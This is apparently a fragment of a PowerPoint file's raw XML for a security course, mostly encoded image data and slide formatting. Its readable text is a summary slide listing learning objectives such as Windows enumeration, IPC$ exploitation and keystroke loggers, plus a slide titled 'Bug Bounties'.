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1679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153400" cy="1630362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1752600"/>
            <a:ext cx="7772400" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Be familiar with basic Windows enumeration techniques. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Know the architecture of Windows computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Explain how IPC$ can be exploited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Describe system hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Describe keystroke loggers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Describe data hiding techniques.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25035328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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug Bounties</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQREBQUEhIVFRIWFRQUFBUUERUUFBYVFhQVGBUUFRQXHCYeFxojGhUUHy8gIycqLCwsFx4xNTAqNSYrLCoBCQoKDgwOGg8PGiwkHyQpLCksLCwsLCwsLCwpLCksLCksLCwsLCksLCwsLCksLCwsLCksLCkpLCwsLCksLCwsLP/AABEIAOEA4QMBIgACEQEDEQH/xAAcAAABBQEBAQAAAAAAAAAAAAAAAwQFBgcCAQj/xABHEAACAQIDBAYHBAkCBAcBAAABAgMAEQQSIQUGMUETIlFhcZEHMlKBobHBFCNy0TNCYoKissLh8BVzNIOS8SREU2OTs9Il/8QAGQEAAwEBAQAAAAAAAAAAAAAAAAIDAQQF/8QAJREAAgICAwACAgIDAAAAAAAAAAECESExAxJBIlEEE5GhQmFx/9oADAMBAAIRAxEAPwDcaKKKACiiigAooooAKK8LW41E4rb4vliXpG7f1R7+f+a1tWY3RLE1H4nb0SaZsx7F1+PD41GPhpJdZnNvYXQfl86XhwiJ6qgd/E+ZraMtg23JX/Rw2Ha5/wC1JMcS3rShe5R+Q+tO6pm7O/7YraE+FkhWMJ0oiYOWLmGTLIDew4ENYDkeNMl9GP8A2WQ7MLetNIfefqTXn+ipzLH3j8qpO/G3cZHjpI4MSYkTAti0URRPmeNmzKS6k2Kq3lTzereOU7AGKjcxzPFhnzRkqQzvHnynkNWHhTU8C2i1f6Ina3mPyr0bLI9WWQfvflaq1uLj5/teOw0s8kyQHDmNpbGQdLGWYFgBccOPZVwxM4jRnb1UVnPgoJPwFK7To1U1Y3VcQvqzX7mF/nelU2xOnrxBh2obH61RdzN/sTiJsNHiYorYqKWWNos6sgiZ1+8RiRY9G1iD2VYNtb+YTB4gQTuyN0YkLCNmRVLFRnK3K8Oy2o1rXF6BNbLLht4Ym0JKHsYWHnw86klcEXBuO0aioR4VkFyARa4NuXjxFNlwLRm8Llf2TqD/AJ30lIa2WWioXD7fKnLOuU+0NVP+d16mI5AwBBBB4EG4rGqNTs6ooorDQooooAKKKKACiiigAooooAKKKKACmuO2ikQux15KOJ/ztpHae1RH1VGaQ8B2d5/Ko6DCEtnkOZz28B4VqRjZzKZMRq5yR8kHPx/v5U32xtnD4CAyzNkjBC6KWZmN7KANSTY8eyoDeT0jQwCPoj0kTySQS4iIh/s8gXjksc7C+a3AhGteudiTDamz5sJimDToOhldbENpmgxSW4hgFcHnY8jVK9Yl/RLY3GT4nZ0kmHSXDYho3aJZFXpQVJKgqbgF1HiM3dVI9HO8ZOMjX7U0seIwweRJ8RneLFIxVlUMb9fKSFGtmHs3qY9GeOxDNPFi8STJhMuHMBRQqqtss5k9ZycpFzy8RVY3j3blixWJw2Hw8jtJNDjsFJGgtDJnIkDyGwRPW4njGnbTpbQrembJWJbRxMmF2jiMQsRMeE2i0ssoZbCLFBFaMpxNwvEaC/fW2Jewva9he3C/O3deos7rYctiWaPP9qKGdXJKN0Ystl5dvjSRdDSVlQ342UmI2vs9Gd1jngxETNE+RmUKz5c2vVbOARzBNO/SfgUh2G8US2ROgRFFzYLIlh2nhzq5pgoxktGn3Yyx9UdQWAsh4qLADTspUygcx5ijtoOuyK3e3agwat0CEGTK0jO7SOxA0uzknS507zTL0jY/odlYpuZiMY8ZSI/kxqwiVfaHmKRx2zo54zHNGkkZsSrqGW44Gx5isvNs2sUVPcrcZ8M8U80/SOuFTDxRiIRiJDZ2BIJztcsL6XufdGbny4jEbSxeNjjjfDSzHCl3kKusUIWzRrazKbJcdvvrRJ4syMtyuZWXMtrrcEZhfS4veq7ujuvLs5GiE4mwwDGKMwrHIHLFmvIDZr8Ne3kBW9rsWtFS9J22ppMZBhsNK8ZieIM6OVPT4g5YlJHZGHb96rnuftuTFpNMbfZzM6YU5bM0UfVMjG+uZgSNORrLd4MBiVlwsTqRjcVJPiJOYWbEN0MSBhp91GGbQ6Zq2jZWzUw8EcMfqRoqL4KLXPedSe800qSRkbbHEkYYWIBHfTRYXhOaE3HNDqD/AJ51CekbbH2bAsVlkjndkXD9FbpHlzAqoBBuunWHMac7F/uxiMW0J+3xRxyrbrRuCrjKCWKj1CCbEXtcG1hakrFj3mix7P2qsunquOKnj7u0U9qv4nB5jmU5XHBhp5082btYk9HLpJyPJv70rRqZKUUUUowUUUUAFFFFABRRRQAVH7U2l0YyrrI3AdneaXx+NESFjx4AdpqIw0JuXfV2+A7K1Ixs9wuFy6tq54njTiqN6UulEcLffHBKz/bPs75JgCAI3vzRSSSOBIF7cQ93b21HhsDAcTj0mWRzHBMQVzKSciOTc5gB1i1rHQnS5pWLEvNFf9I25rR9Li8KpyuAcXCvE5TmXFRjlIh6x9/IveA3NxUsWIw2KwyNLh5WOFxEcSljExOYqF5R3++QngCyE6VtdRux93cPhOk+zxLH0rZ3y31OthrwUXNlGgvWqeKZjhm0Re2vR9hsVivtEufVBHJGrlI5spuply6sBYC1xfKvZViZ1RRcgKNBrppwpE4ktpHbvc+qPD2jUdtXbWGwYDTyjOfVB60jfgQcvh30uXg3CySX2lm9RNPabqj3Dia5ZGtd5LDnlAUf9RuaoG1/SVIQTGFiS9gzHO593qg93W8az/a+88+IY5pWI5XJJ8uA9wqseFshP8iMTa8Xt3BRfpJ47/tS5z5AmmB392cDYSIT3Rk/01hxZjxYnxJrzoaquBfZzv8ALfiNzO/WA5uo8YiPpTrDbxYGT1Jo79zlD8bVgnRE2Gp7Bx8hSkUVza6ppfrA2PwNuflR+lfZq/Kf0fRcZuLpKSO+zr58fjSoxLD1luO1Nf4TrXzvhNsz4dvu5CttOqxAPlWgbH38xCKplUSAi9wRcfvAWPl76nLhaLQ/IUjTY5VfgQbG/eD22PA0rVb2ZvFBivVa0nZ6sg//AF8al0xZX19V9sDh+IcvEVFqjoUkyp7F2dLj9ovjcTG8cOHZocHDIpVswPXnZTzvw77ewKjN+961xM64COUxYbpEjxuJCkqpa9sOGAsCSpBJ0vpwDVoW0cO0sLpHKY2dCqyoAWQkaMt9P80I41Vt2MMuydnSDGJHEsUjFpVbpPtGqlJcp1Dk5VCnW6jhTJ+mNeEvsjBDZ8DLPi80Cv8AdNOVUxRmwWJpSRnsb2JtpYWqUmhWVQQQdAVYG4sdQQRxBrM9tY07Ux